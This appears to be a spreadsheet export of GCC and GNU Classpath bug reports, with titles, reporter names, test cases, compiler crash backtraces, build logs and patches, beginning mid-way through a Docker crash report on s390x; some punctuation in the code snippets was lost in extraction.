	/builddir/build/BUILD/docker-1dcc59a0b40f7d29ab2e0b8fdeb0adf537dbcbaf/_build/src/github.com/docker/docker/daemon/execdriver/native/init.go:35
github_com_docker_docker_pkg_reexec.Init
	/builddir/build/BUILD/docker-1dcc59a0b40f7d29ab2e0b8fdeb0adf537dbcbaf/_build/src/github.com/docker/docker/pkg/reexec/reexec.go:26
main.main
	/builddir/build/BUILD/docker-1dcc59a0b40f7d29ab2e0b8fdeb0adf537dbcbaf/docker/docker.go:29
goroutine 18 [finalizer wait]:
created by runtime_createfing
	../../../libgo/runtime/mgc0.c:2572
goroutine 19 [syscall]:
	goroutine in C code stack unavailable
created by os_signal..import
	../../../libgo/go/os/signal/signal_unix.go:25
Expected results:
docker run docker.io/jcajka/fedora22-s390x -itv /root/dir/:/root/dir/ /bin/bash
FATA[0000] Error response from daemon: Cannot start container fb6ed2f3efd57fa07ddf5c4d8576408d0f4cb95fe645a335063f7bed014a0654: [8] System error: exec: -itv: executable file not found in $PATH
Additional info:
Crash seems to be triggered by creating new Frame using invalid pc/filename/line in libcontainer(seen this crash from time to time but haven't got reliable reproducer until now). As libgo's runtime.Caller(capture.go:14) returns seemingly invalid data(00) later used in runtime.FuncForPC/parseFunctionName(frame.go). This could be workaround by extending/fixing check in capture.go:15 but I think that runtime.Caller shouldn't return ok state when returned data seems invalid. Patch in attachment prevents this crash.
----------------------
I'm attaching their suggested patch.</t>
  </si>
  <si>
    <t>GCC-1515</t>
  </si>
  <si>
    <t>segmentation fault while bootstrapping gcc-20001225</t>
  </si>
  <si>
    <t>./xgcc -v --save-temps -B./ -B/usr/local/hppa1.1-hp-hpux10.20/bin/ -i
system /usr/local/hppa1.1-hp-hpux10.20/include -S tmp-dum.c
Reading specs from ./specs
Configured with: ./configure
gcc version 2.97 20001225 (experimental)
 ./cpp0 -lang-c -v -iprefix ./../lib/gcc-lib/hppa1.1-hp-hpux10.20/2.97/ -isystem
 ./include -isystem /usr/local/hppa1.1-hp-hpux10.20/bin/include -D__GNUC__=2 -D_
_GNUC_MINOR__=97 -D__GNUC_PATCHLEVEL__=0 -Dhppa -Dhp9000s800 -D__hp9000s800 -Dhp
9k8 -DPWB -Dhpux -Dunix -D__hppa__ -D__hp9000s800__ -D__hp9000s800 -D__hp9k8__ -
D__PWB__ -D__hpux__ -D__unix__ -D__hppa -D__hp9000s800 -D__hp9k8 -D__PWB -D__hpu
x -D__unix -Asystem=unix -Asystem=hpux -Acpu=hppa -Amachine=hppa -D__STDC_HOSTED
__=1 -D_PA_RISC1_1 -D__hp9000s700 -D_HPUX_SOURCE -D_HIUX_SOURCE -D__STDC_EXT__ -
isystem /usr/local/hppa1.1-hp-hpux10.20/include tmp-dum.c tmp-dum.i
GNU CPP version 2.97 20001225 (experimental) (cpplib) (hppa)
ignoring nonexistent directory include
ignoring nonexistent directory /usr/local/hppa1.1-hp-hpux10.20/bin/include
ignoring nonexistent directory /usr/local/hppa1.1-hp-hpux10.20/include
ignoring nonexistent directory ../lib/gcc-lib/hppa1.1-hp-hpux10.20/2.97/include
ignoring nonexistent directory ../hppa1.1-hp-hpux10.20/include
ignoring nonexistent directory /usr/local/lib/gcc-lib/hppa1.1-hp-hpux10.20/2.97
/include
ignoring nonexistent directory /usr/local/hppa1.1-hp-hpux10.20/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/include
End of search list.
 ./cc1 -fpreprocessed tmp-dum.i -quiet -dumpbase tmp-dum.c -version -o tmp-dum.s
GNU C version 2.97 20001225 (experimental) (hppa1.1-hp-hpux10.20) compiled by CC
.
cc1: Internal error: Segmentation fault.
Please submit a full bug report.
 See  for instructions.
Release:
gcc-2.97 20001225
Environment:
HP-UX hpli6 B.10.20 A 9000/770 2014293960 two-user license
env CC=cc CXX=CC ./configure
hppa1.1-hp-hpux10.20
How-To-Repeat:
compile the following file:
# 1 tmp-dum.c
int xxy_us_dummy</t>
  </si>
  <si>
    <t>staelin</t>
  </si>
  <si>
    <t>GCC-549</t>
  </si>
  <si>
    <t>Re: c/544: current GCC failed with invalid lvalue in assignment</t>
  </si>
  <si>
    <t xml:space="preserve"> On Mon Sep 18 2000 at 06:21:11AM -0000 aj@suse.de wrote:
 &gt; rcmd2.i: In function `rcmd_af':
 &gt; rcmd2.i:28: invalid lvalue in assignment
 I think it moderately interesting that this is the second time
 I've fixed this bug.  The last time was in the C++ front end:
 2000-04-23  Richard Henderson  
         * typeck.c (c_expand_asm_operands): Restore the original
         contents of the output list.
 r~
         * c-typeck.c (c_expand_asm_operands): Restore the output tree
         after expanding.
 Index: c-typeck.c
 ===================================================================
 RCS file: /cvs/gcc/egcs/gcc/c-typeck.cv
 retrieving revision 1.91
 diff -c -p -d -r1.91 c-typeck.c
 *** c-typeck.c	2000/09/19 03:26:10	1.91
 --- c-typeck.c	2000/09/19 14:22:59
 *************** c_expand_asm_operands (string outputs 
 *** 66036608 ****
 --- 66036612 ----
   	  expand_expr (build_modify_expr (o[i] NOP_EXPR TREE_VALUE (tail))
   		       NULL_RTX VOIDmode EXPAND_NORMAL)
   	  free_temp_slots ()
 + 
 + 	  /* Restore the original value so that it's correct the next
 + 	     time we expand this function.  */
 + 	  TREE_VALUE (tail) = o[i]
   	}
         /* Detect modification of read-only values.
   	 (Otherwise done by build_modify_expr.)  */
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-83016</t>
  </si>
  <si>
    <t>gnat1: warning: command line option â€˜-nostdinc++â€™ is valid for C++/ObjC++ but not for Ada</t>
  </si>
  <si>
    <t>When bootstrapping trunk @253865 (for example IIRC occurs since quite some time now):
xg++ -c -gnatA -gnatWb -gnatiw -B/scratch/obj.x86_64/gcc-8.0.mine/./gcc/ -nostdinc++ -nostdinc++ -I/scratch/obj.x86_64/gcc-8.0.mine/x86_64-pc-linux-gnu/libstdc++-v3/include/x86_64-pc-linux-gnu -I/scratch/obj.x86_64/gcc-8.0.mine/x86_64-pc-linux-gnu/libstdc++-v3/include -I/scratch/src/gcc-8.0.mine/libstdc++-v3/libsupc++ -I/scratch/src/gcc-8.0.mine/libstdc++-v3/include/backward -I/scratch/src/gcc-8.0.mine/libstdc++-v3/testsuite/util -B/scratch/obj.x86_64/gcc-8.0.mine/x86_64-pc-linux-gnu/libstdc++-v3/src/.libs -B/scratch/obj.x86_64/gcc-8.0.mine/x86_64-pc-linux-gnu/libstdc++-v3/libsupc++/.libs -B/opt/x86_64/gcc-8.0.mine/x86_64-pc-linux-gnu/bin/ -B/opt/x86_64/gcc-8.0.mine/x86_64-pc-linux-gnu/lib/ -isystem /opt/x86_64/gcc-8.0.mine/x86_64-pc-linux-gnu/include -isystem /opt/x86_64/gcc-8.0.mine/x86_64-pc-linux-gnu/sys-include -static-libstdc++ -static-libgcc -I- -I../rts -I. -I/scratch/src/gcc-8.0.mine/gcc/ada -static-libstdc++ -static-libgcc -gnatws /scratch/obj.x86_64/gcc-8.0.mine/gcc/ada/tools/b~gnatcmd.adb
gnat1: warning: command line option â€˜-nostdinc++â€™ is valid for C++/ObjC++ but not for Ada
ISTM the driver should filter out -nostdinc++ for ADA (or gnat1 should silently ignore it)</t>
  </si>
  <si>
    <t>GCC-11050</t>
  </si>
  <si>
    <t>[3.4 regression] some string __FUNCTION__ is accepted</t>
  </si>
  <si>
    <t>This is a fork of 7755: with the new parser we again accept this
----------------------------
#include 
int main(int argc char *argv[])
 {
   puts(This is  __FUNCTION__)
   return 0
 }
----------------------------
This is supposed to be illegal since expansion of __FUNCTION__ happens
much much later than string concatenation. Not surprising the
output is not what one would expect: It is just This is no function
name.
This is a regression on mainline w.r.t. 3.3 and previous versions.
W.</t>
  </si>
  <si>
    <t>GCC-16437</t>
  </si>
  <si>
    <t>[4.0 Regression] New c-torture failures after bitfield patch</t>
  </si>
  <si>
    <t>gcc.c-torture/execute/991118-1.c and gcc.c-torture/execute/bf64-1.c started
failing after the fix for PR2511 and PR3325 went into mainline.
2004-07-08  Joseph S. Myers  
            Neil Booth  
        PR c/2511
        PR c/3325
        * c-decl.c (finish_struct): Ensure bit-fields are given the
        correct type.
        * c-common.c (c_common_signed_or_unsigned_type): For C require
        the precision to match as well as the mode.
        * expr.c (reduce_to_bit_field_precision): New function.
        (expand_expr_real_1): Reduce expressions of bit-field type to
        proper precision.
        * langhooks.h (reduce_bit_field_operations): New hook.
        * langhooks-def.h (LANG_HOOKS_REDUCE_BIT_FIELD_OPERATIONS):
        Define.
        * c-lang.c objc/objc-lang.c
        (LANG_HOOKS_REDUCE_BIT_FIELD_OPERATIONS): Define.
        * objc/objc-act.c (check_ivars): Convert types to bit-field types
        before checking.
        * tree.c (build_nonstandard_integer_type): New function.
        * tree.h (build_nonstandard_integer_type): New prototype.
        * tree-ssa.c (tree_ssa_useless_type_conversion_1): Don't treat
        conversions between integer and boolean types as useless.
We are getting confused very early on.  Probably in fold.  Here's a diff between
the bad .03.original (-) and the good .03.original dumps (+).
$ diff -dup 00bad/bf64-1.c.t03.original 00good/
--- 00bad/bf64-1.c.t03.original 2004-07-08 11:13:56.000000000 -0400
+++ 00good/bf64-1.c.t03.original        2004-07-08 11:14:35.000000000 -0400
@@ -137 +137 @@
  enabled by -tree-original
 {
-  tmp2.field = ()(long int)((long long int)tmp2.field |
2381903268435576)
+  tmp2.field = tmp2.field | 2381903268435576
   return tmp2
 }
@@ -2318 +2318 @@
  enabled by -tree-original
 {
-  struct tmp tmp = {.pad=291 .field=-1099243257841}
-  struct tmp2 tmp2 = {.field=-1099243257841 .pad=291}
+  struct tmp tmp = {.pad=291 .field=4502500384112655}
+  struct tmp2 tmp2 = {.field=4502500384112655 .pad=291}
-    struct tmp tmp = {.pad=291 .field=-1099243257841}
-    struct tmp2 tmp2 = {.field=-1099243257841 .pad=291}
+    struct tmp tmp = {.pad=291 .field=4502500384112655}
+    struct tmp2 tmp2 = {.field=4502500384112655 .pad=291}
   tmp = sub (tmp)
   tmp2 = sub2 (tmp2)
-  if (1)
+  if ((int)tmp.pad != 291 || (long long unsigned int)tmp.field != 01fff567f)
     {
       abort ()
     }
-  if (1)
+  if ((int)tmp2.pad != 291 || (long long unsigned int)tmp2.field != 01fff567f)
     {
       abort ()
     }</t>
  </si>
  <si>
    <t>GCC-29729</t>
  </si>
  <si>
    <t>[4.0 regression] ICE with template class in template function</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 3.0:
=================================================
template void foo(T)
{
  struct A
  {
    template struct B
    {
      typedef B C
    }
  }
}
=================================================
bug.cc: In function 'void foo(T)':
bug.cc:1: internal compiler error: in tsubst at cp/pt.c:7337
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-10868</t>
  </si>
  <si>
    <t>java.net.ServerSocket's constructors create and leak extra sockets</t>
  </si>
  <si>
    <t>The control flow of ServerSocket(int port int backlog InetAddress bindAddr) is as follows:
 this()
 impl.create(true)
 impl.bind(bindAddr port)
 impl.listen(backlog)
The call to this() also calls impl.create(true) meaning that a second socket is created and the original socket is leaked. ServerSocket(int port) and ServerSocket(int port int backlog) both call ServerSocket(int port int backlog InetAddress bindAddr) so they also leak a socket per call.
Release:
HEAD
Environment:
Red Hat Linux 9</t>
  </si>
  <si>
    <t>GCC-28788</t>
  </si>
  <si>
    <t>[gfortran: 4.1 4.2 regression] ICE on valid code</t>
  </si>
  <si>
    <t>Current gfortran (trunk and head of 4.1 branch) segfaults when compiling the
following code:
module Precision
  integer parameter :: dl = KIND(1.d0)
end module Precision
module ModelParams
use precision
type CAMBparams
  real(dl)::omegabh0tcmbyhe
end type
type (CAMBparams) :: CP
contains
subroutine CAMBParams_Set(P)
  type(CAMBparams) intent(in) :: P
end subroutine CAMBParams_Set
end module ModelParams
module TimeSteps
use precision
use ModelParams
end module TimeSteps
module ThermoData
use TimeSteps
contains
subroutine inithermo(taumintaumax)
  use precision
  use ModelParams
  real(dl) taumintaumax
  call InitRECFAST(CP%omegabCP%h0CP%tcmbCP%yhe)
end subroutine inithermo
end module ThermoData
martin@linux:~/tmp&gt; gfortran -v -c modules.F90
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: /home/martin/software/gcc/configure --disable-multilib --with-gmp=/home/martin/software/mygmp --with-mpfr=/home/martin/software/mympfr --prefix=/home/martin/software/ugcc --enable-languages=c++fortran --enable-checking=release
Thread model: posix
gcc version 4.2.0 20060821 (experimental)
 /home/martin/software/ugcc/libexec/gcc/x86_64-unknown-linux-gnu/4.2.0/cc1 -E -lang-fortran -traditional-cpp -D_LANGUAGE_FORTRAN -quiet -v modules.F90 -mtune=generic -o /tmp/ccNsJVqs.f95
ignoring nonexistent directory /home/martin/software/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.2.0/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /home/martin/software/ugcc/include
 /home/martin/software/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.2.0/include
 /usr/include
End of search list.
 /home/martin/software/ugcc/libexec/gcc/x86_64-unknown-linux-gnu/4.2.0/f951 /tmp/ccNsJVqs.f95 -ffree-form -quiet -dumpbase modules.F90 -mtune=generic -auxbase modules -version -fpreprocessed -I /home/martin/software/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.2.0/finclude -o /tmp/cciJjRCJ.s
GNU F95 version 4.2.0 20060821 (experimental) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.2.0 20060821 (experimental).
GGC heuristics: --param ggc-min-expand=98 --param ggc-min-heapsize=128005
 In file modules.F90:33
  use ModelParams
                1
modules.F90:16: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This problem was not present a few days ago and it is quite elusive. Even adding or removing a few !innocent lines can change the error message
e.g. to something like
 In file modules.F90:43
        use ModelParams
                      1
Error: The derived type 'p' at (1) is of type '' which has not been defined.
which makes no sense.</t>
  </si>
  <si>
    <t>GCC-64057</t>
  </si>
  <si>
    <t>possible issue in the shared implementation of Ada.Strings.Unbounded</t>
  </si>
  <si>
    <t>Created attachment 34099
memcpy wrapper with overlap detection
The Ada front end generates a overlapping memcpy call for some array assignments.
Using a strict version of memcpy that checks for overlap breaks gnat 4.8 and 4.9 on my Linux and OpenBSD test systems. Other applications compiled with gnat may be affected as well.
Easy way to reproduce:
Build gnat and ^C once gcc/ada/bldtools/sinfo is generated.
Build the attached memcpy wrapper or patch your libc with checks.
$ cd $BUILD/gcc/ada/bldtools/sinfo
$ LD_PRELOAD=./memcpy.so gdb ./xsinfo
GNU gdb (GDB) 7.8.1
Copyright (C) 2014 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as x86_64-unknown-linux-gnu.
Type show configuration for configuration details.
For bug reporting instructions please see:
.
Find the GDB manual and other documentation resources online at:
.
For help type help.
Type apropos word to search for commands related to word...
Reading symbols from ./xsinfo...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/tulmer/tmp/gcc/src/gcc-build/gcc/ada/bldtools/sinfo/xsinfo 
warning: Could not load shared library symbols for linux-vdso.so.1.
Do you need set solib-search-path or set sysroot?
Check for field name consistency
     OK
Check for function consistency
     OK
Check for missing functions
     OK
Check for set procedure consistency
     OK
Check for missing set procedures
     OK
Check pragma Inlines are all for existing subprograms
memcpy(0x6c125c 0x6c1260 14)
dest=Set_ABE_Is_Certainbs src=ABE_Is_Certainbs
Program received signal SIGABRT Aborted.
0x00007ffff786aa97 in raise () from /usr/lib/libc.so.6
(gdb) bt
#0  0x00007ffff786aa97 in raise () from /usr/lib/libc.so.6
#1  0x00007ffff786be6a in abort () from /usr/lib/libc.so.6
#2  0x00007ffff7bda879 in memcpy () from ./memcpy.so
#3  0x000000000042c20e in ada.strings.unbounded.set_unbounded_string ()
#4  0x0000000000443b31 in gnat.spitbol.patterns.xmatch ()
#5  0x000000000044488b in gnat.spitbol.patterns.match ()
#6  0x000000000040afd0 in csinfo ()
#7  0x000000000041bb69 in xsinfo ()
Let me know if you need more info</t>
  </si>
  <si>
    <t>tobiasu</t>
  </si>
  <si>
    <t>GCC-8888</t>
  </si>
  <si>
    <t>Linking shared libraries with -pthread fails to link to libpthread</t>
  </si>
  <si>
    <t>Linking a shared library with -pthread does not link in libpthread.so on linux. 
Quoting from the corresponding GLib bug report about the reasons that libpthread.so has to be on the linking line also for shared libs:
 - prelink in order for prelink to preresolve relocations
   for a library must not have undefined symbols any 
   undefined symbols will always have to handled at run 
   time.
 - Symbol versioning the binding of symbols to particular 
   versions happens when the library is linked. If -lpthread
   not on the link line then the symbol will get the base 
   version at run time not the correct newer one. 
Please see 
    http://bugzilla.gnome.org/show_bug.cgi?id=100697
for further information.
Release:
CVS
Environment:
Linux</t>
  </si>
  <si>
    <t>wilhelmi</t>
  </si>
  <si>
    <t>GCC-54440</t>
  </si>
  <si>
    <t>[c++11] g++ prematurely applying rule that a template parameter pack cannot be followed by a template parameter</t>
  </si>
  <si>
    <t>The following code:
  template
  struct S
  {
    template class...A template class B&gt;
    struct T
  }
yields:
  main.cpp:5:12: error: parameter pack â€˜Aâ€™ must be at the end of the template parameter list
I believe this is erroneous as does clang developer Richard Smith. After S is instantiated A instantiates to a non-pack.</t>
  </si>
  <si>
    <t>GCC-59502</t>
  </si>
  <si>
    <t>[OOP] ICE on invalid on pointer assignment to non-pointer CLASS</t>
  </si>
  <si>
    <t>The following causes an ICE with gfortran 4.9 (r205975):
module cp
  type :: d
  end type d
  type public :: p
     class(d) :: pd
  end type p
contains
  function pc(pd)
    implicit none
    type(p) :: pc
    class(d) intent(in) target :: pd
    pc%pd =&gt; pd
    return
  end function pc
end module cp
$ gfortran -v
Using built-in specs.
COLLECT_GCC=/opt/gcc-trunk/bin/gfortran
COLLECT_LTO_WRAPPER=/opt/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/opt/gcc-trunk --enable-languages=cc++fortran --disable-multilib
Thread model: posix
gcc version 4.9.0 20131213 (experimental) (GCC) 
$ gfortran test.F90 -o test.o -c
f951: internal compiler error: Segmentation fault
0x9f251f crash_signal
        ../../gcc-trunk/gcc/toplev.c:336
0x5ae283 gfc_match_varspec(gfc_expr* int bool bool)
        ../../gcc-trunk/gcc/fortran/primary.c:2044
0x5ae70d match_variable
        ../../gcc-trunk/gcc/fortran/primary.c:3304
0x58fe19 gfc_match(char const* ...)
        ../../gcc-trunk/gcc/fortran/match.c:1116
0x590fdc gfc_match_assignment()
        ../../gcc-trunk/gcc/fortran/match.c:1293
0x5a5239 match_word
        ../../gcc-trunk/gcc/fortran/parse.c:65
0x5a61d1 match_word
        ../../gcc-trunk/gcc/fortran/parse.c:327
0x5a61d1 decode_statement
        ../../gcc-trunk/gcc/fortran/parse.c:327
0x5a7741 next_free
        ../../gcc-trunk/gcc/fortran/parse.c:784
0x5a7741 next_statement
        ../../gcc-trunk/gcc/fortran/parse.c:977
0x5a8103 parse_spec
        ../../gcc-trunk/gcc/fortran/parse.c:2768
0x5a9f78 parse_progunit
        ../../gcc-trunk/gcc/fortran/parse.c:4148
0x5aa2fc parse_contained
        ../../gcc-trunk/gcc/fortran/parse.c:4087
0x5ab50d parse_module
        ../../gcc-trunk/gcc/fortran/parse.c:4350
0x5ab50d gfc_parse_file()
        ../../gcc-trunk/gcc/fortran/parse.c:4652
0x5e8ff5 gfc_be_parse_file
        ../../gcc-trunk/gcc/fortran/f95-lang.c:188
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
The code is invalid as pd should have either allocatable or pointer attributes. If the pointer assignment pc%pd =&gt; pd is removed then compilation correctly fails with:
$ gfortran test.F90 -o test.o -c
test.F90:7.19:
     class(d) :: pd
                   1
Error: Component 'pd' with CLASS at (1) must be allocatable or pointer</t>
  </si>
  <si>
    <t>GCC-82045</t>
  </si>
  <si>
    <t>[8 regression] SPARC bootstrap broken: ICE in emit_library_call_value_1 at calls.c:4565</t>
  </si>
  <si>
    <t>Within the last day SPARC bootstrap got broken building the stage1 libgcc:
during RTL pass: expand
/vol/gcc/src/hg/trunk/local/libgcc/libgcc2.c: In function '__multc3':
/vol/gcc/src/hg/trunk/local/libgcc/libgcc2.c:1990:17: internal compiler error: in emit_library_call_value_1 at calls.c:4565
   if (isnan (x) &amp;&amp; isnan (y))
                 ^
0x9759f3 emit_library_call_value_1
        /vol/gcc/src/hg/trunk/local/gcc/calls.c:4564
0x977e33 emit_library_call(rtx_def* libcall_type machine_mode int ...)
        /vol/gcc/src/hg/trunk/local/gcc/calls.c:5148
0x17330e7 sparc_emit_float_lib_cmp(rtx_def* rtx_def* rtx_code)
        /vol/gcc/src/hg/trunk/local/gcc/config/sparc/sparc.c:8140
0x171f887 emit_scc_insn(rtx_def**)
        /vol/gcc/src/hg/trunk/local/gcc/config/sparc/sparc.c:3174
0x19a0b8f gen_cstoretf4(rtx_def* rtx_def* rtx_def* rtx_def*)
        /vol/gcc/src/hg/trunk/local/gcc/config/sparc/sparc.md:779
0xfaa32f insn_gen_fn::operator()(rtx_def* rtx_def* rtx_def* rtx_def*) const
        /vol/gcc/src/hg/trunk/local/gcc/recog.h:303
0xfa9c43 maybe_gen_insn(insn_code unsigned int expand_operand*)
        /vol/gcc/src/hg/trunk/local/gcc/optabs.c:7082
0xfaa00f maybe_expand_insn(insn_code unsigned int expand_operand*)
        /vol/gcc/src/hg/trunk/local/gcc/optabs.c:7112
0xb6eb1f emit_cstore(rtx_def* insn_code rtx_code machine_mode machine_mode int rtx_def* rtx_def* int machine_mode)
        /vol/gcc/src/hg/trunk/local/gcc/expmed.c:5357
0xb6f84b emit_store_flag_1
        /vol/gcc/src/hg/trunk/local/gcc/expmed.c:5600
0xb706ef emit_store_flag(rtx_def* rtx_code rtx_def* rtx_def* machine_mode int int)
        /vol/gcc/src/hg/trunk/local/gcc/expmed.c:5860
0xb70e37 emit_store_flag_force(rtx_def* rtx_code rtx_def* rtx_def* machine_mode int int)
        /vol/gcc/src/hg/trunk/local/gcc/expmed.c:5994
0xbac1c3 do_store_flag
        /vol/gcc/src/hg/trunk/local/gcc/expr.c:11546
0xb9f393 expand_expr_real_2(separate_ops* rtx_def* machine_mode expand_modifier)
        /vol/gcc/src/hg/trunk/local/gcc/expr.c:9288
0xba2093 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
        /vol/gcc/src/hg/trunk/local/gcc/expr.c:9815
0xb987cb expand_expr_real(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
        /vol/gcc/src/hg/trunk/local/gcc/expr.c:8105
0xb73733 expand_expr
        /vol/gcc/src/hg/trunk/local/gcc/expr.h:276
0xb96b67 expand_operands(tree_node* tree_node* rtx_def* rtx_def** rtx_def** expand_modifier)
        /vol/gcc/src/hg/trunk/local/gcc/expr.c:7704
0xba0d0b expand_expr_real_2(separate_ops* rtx_def* machine_mode expand_modifier)
        /vol/gcc/src/hg/trunk/local/gcc/expr.c:9606
0x999073 expand_gimple_stmt_1
        /vol/gcc/src/hg/trunk/local/gcc/cfgexpand.c:3691
A reghunt identified this patch
[7/77] Add scalar_float_mode
This patch adds a scalar_float_mode class which wraps a mode enum
that is known to satisfy SCALAR_FLOAT_MODE_P.  Things like SFmode
now give a scalar_float_mode object instead of a machine_mode.
This in turn needs a change to the real.h format_helper so that
it can accept both machine_modes and scalar_float_modes.
2017-08-30  Richard Sandiford  
            Alan Hayward  
            David Sherwood  
gcc/
        * coretypes.h (scalar_float_mode): New type.
        * machmode.h (mode_traits::from_int): Use machine_mode if
        USE_ENUM_MODES is defined.
as the culprit.
  Rainer</t>
  </si>
  <si>
    <t>GCC-40297</t>
  </si>
  <si>
    <t>[C++0x] debug mode vs atomics</t>
  </si>
  <si>
    <t>The atomic types in  have debug-mode assertions that will always fail.
#define _GLIBCXX_DEBUG
#include 
int main()
{
    std::atomic_address ptr
    return ptr.load() ? 0 : 1
}
Fails with:
/dev/shm/wakelyjo/insroot/gcc/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/atomic_2.h:114: void* std::__atomic2::atomic_address::load(std::memory_order) const volatile: Assertion '__m == memory_order_release' failed.
Due to:
    void*
    load(memory_order __m = memory_order_seq_cst) const volatile
    {
      __glibcxx_assert(__m == memory_order_release)
      __glibcxx_assert(__m == memory_order_acq_rel)
      __sync_synchronize()
      void* __ret = _M_i
      __sync_synchronize()
      return __ret
    }
Since memory_order is an enumeration and each enumerator has a distinct value it's not possible for both assertions to pass.
I'm not sure what they were intended to check unless it's to prevent atomics being used in debug mode!</t>
  </si>
  <si>
    <t>GCC-5671</t>
  </si>
  <si>
    <t>verify.cc problem merging local variables</t>
  </si>
  <si>
    <t xml:space="preserve">	During the merging of the local variables if the previous variable is an interface then running through the superclasses leads you directly to NULL eventually thus causing a segmentation fault.
Release:
3.1 20020211 (experimental)
Environment:
System: Linux escher 2.4.9-21 #1 Thu Jan 17 14:16:30 EST 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure --enable-threads=posix --prefix=/home/tstock/local --disable-shared --enable-languages=c++java
How-To-Repeat:
import java.io.*
import java.util.*
public class Test
  {
  public static void main(String[] args)
    {
      new Test().doit()
    }
  public void doit( )
    {
      String x = abc
      try
      {
        Properties props = new Properties()
        Enumeration enum = props.propertyNames()
      }
      catch( Exception e )
      {
      }
      String _x = def
      try
      {
        Properties props = new Properties()
        Enumeration enum = props.propertyNames()
      }
      catch( Exception e )
      {
      }
    }
  }</t>
  </si>
  <si>
    <t>toddastock</t>
  </si>
  <si>
    <t>GCC-51786</t>
  </si>
  <si>
    <t>[c++0x] Invalid declaration with decltype accepted</t>
  </si>
  <si>
    <t>The error message declaration does not declare anything is not
triggered in certain cases when using decltype:
===================================
struct A {}
void foo() { decltype(A()) }
===================================
It *is* triggered if I write decltype(int) instead.
Another testcase is the following:
===================================
template struct A
{
  A() { decltype(this) }
}
A a
===================================
It *is* triggered if I make A a non-template class.
This bug is similar to PR21120 where the same problems occured with typeof.</t>
  </si>
  <si>
    <t>CLASSPATH-26486</t>
  </si>
  <si>
    <t>Graphics.fillRect extremely slow</t>
  </si>
  <si>
    <t>Compile and run the attached testcase. Use the -sleep  parameter
to specify the sleep delay between repaints e.g.
java FillRect -sleep 50     (20 frames/second nominally)
java FillRect -sleep 10     (100 frames/second)
java FillRect -sleep  1     (1000 frames/second)
java FillRect -sleep  0     (no repaints at all)
On my system (Athlon 2600+ Suse 8.2) the animation runs at about 
50 frames/second max. on the reference implementation but runs at a measly 
3..5 frames/second on jamvm+classpath cvs 2006.02.24 or gcj 4.2.0.
Note that the animation only uses Graphics.setColor() and Graphics.fillRect()
with 3x3 pixel rectangles. For a more fancy animation see my GameOf Life testcase submitted to http://gcc.gnu.org/ml/java/2006-02/msg00194.html. 
(Consider that testcase as GPLed too.)
- Norman</t>
  </si>
  <si>
    <t>GCC-42889</t>
  </si>
  <si>
    <t>[4.5 Regression] -fcompare-debug failure (length) with -O1 -fgcse</t>
  </si>
  <si>
    <t>Command line:
gcc -O1 -fgcse -fcompare-debug -c testcase.c
Tested revisions:
r156293 - crash
r155833 - crash
r155363 - OK
r154886 - OK
r153685 - OK
Output:
$ /mnt/svn/gcc-trunk/binary-155833-lto/bin/gcc -O1 -fgcse -fcompare-debug -c testcase.c
gcc: testcase.c: -fcompare-debug failure (length)
I noticed this because gentoo's weekly gcc-4.5.0_alpha builds started failing with 20100107 last working 20091231 at both x86 and x86_64.
I reproduced bootstrap failure when configure with --disable-checking fails at builtins.o (there is actually different code being emited).</t>
  </si>
  <si>
    <t>GCC-71573</t>
  </si>
  <si>
    <t>ICE on invalid C code on x86_64-linux-gnu (tree check: expected function_decl have var_decl in implicitly_declare)</t>
  </si>
  <si>
    <t>The following code crashes the trunk on on x86_64-linux-gnu in both 32-bit and 64-bit modes. 
gcc-6.1 and all older versions do not crash. This should be a recent regression.
$: gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160617 (experimental) [trunk revision 237557] (GCC) 
$: 
$: gcc-trunk small.c
small.c: In function â€˜f2â€™:
small.c:4:3: internal compiler error: tree check: expected function_decl have var_decl in implicitly_declare at c/c-decl.c:3313
   t(g)
   ^
0xe6b3bc tree_check_failed(tree_node const* char const* int char const* ...)
	../../gcc-source-trunk/gcc/tree.c:9752
0x64dc01 tree_check
	../../gcc-source-trunk/gcc/tree.h:3030
0x64dc01 implicitly_declare(unsigned int tree_node*)
	../../gcc-source-trunk/gcc/c/c-decl.c:3313
0x66ba52 build_external_ref(unsigned int tree_node* int tree_node**)
	../../gcc-source-trunk/gcc/c/c-typeck.c:2728
0x6a1457 c_parser_postfix_expression
	../../gcc-source-trunk/gcc/c/c-parser.c:7497
0x6a1c2a c_parser_unary_expression
	../../gcc-source-trunk/gcc/c/c-parser.c:6942
0x6a2a3a c_parser_cast_expression
	../../gcc-source-trunk/gcc/c/c-parser.c:6771
0x6a2c44 c_parser_binary_expression
	../../gcc-source-trunk/gcc/c/c-parser.c:6580
0x6a38f5 c_parser_conditional_expression
	../../gcc-source-trunk/gcc/c/c-parser.c:6351
